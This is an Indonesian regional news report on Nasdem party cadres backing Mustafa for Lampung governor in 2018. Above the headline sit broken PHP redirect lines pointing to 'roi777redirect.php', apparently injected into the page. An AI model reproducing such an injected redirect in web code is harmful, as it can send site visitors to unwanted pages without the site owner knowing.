header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Kader Militan Nasdem Tubaba Serukan Mustafa Cagub Lampung yang Dikhawatirkan Cagub Lainnya ‎ -
Kader Militan Nasdem Tubaba Serukan Mustafa Cagub Lampung yang Dikhawatirkan Cagub Lainnya ‎

TRANSLAMPUNG.COM, PANARAGAN
‎Kader Militan Partai Nasdem Kabupaten Tulangbawang Barat (Tubaba) serukan Kakak Mustafa Adalah Satu diantara Calon Gubernur Provinsi  Lampung yang di khawatirkan oleh calon Gubernur Lampung Lainnya.

Hal tersebut diungkapkan pada kegiatan ‎Rapat Kerja Dewan Khusus (RAKERDASUS) DPD Partai Nasdem Tubaba upaya turut mensukseskan Pilgub 2018 serta Pileg dan Pilpres 2019 mendatang.

Kegiatan Rakerdasus tersebut dipusatkan pada Sekretariat DPD Partai Nasdem di Kelurahan Panaragan Jaya, Kecamatan Tulangbawang Tengah, Tubaba. Yang dihadiri langsung ketua Plt DPW Partai Nasdem Provinsi Lampung Toufik Bastari  dan seluruh Kader militan Nasdem Se-Kabupaten.

menurut Ketua Plt DPW Partai Nasdem Lampung Toufik bastari‎ dalam sambutannya mengatakan, perlu kita ketahui Kakak mustafa adalah calon Gubernur Lampung yang di zholimi oleh para pesaingnya, untuk itu kita yakin Mustafa tetap di jalan aman selalu memperjuangkan rakyat di Lampung Tengah bukan untuk kepentingan pribadinya.‎

” Kakak Mustafa adalah salah satu calon Gubernur Lampung yang di takuti oleh para calon Gubernur Lampung lainnya maka dari itu saya meminta kepada seluruh kader militan Nasdem Tubaba untuk tetap komitmen mendukung Mustafa tetap maju dalam Pilgub Lampung dan harus menang demi Rakyat lampung khusunya,” kata Toufik saat dikutip translampung.com ‎pada (24/3/2018) sekira pukul 10:30 WIB. (Dirman)


News Reporter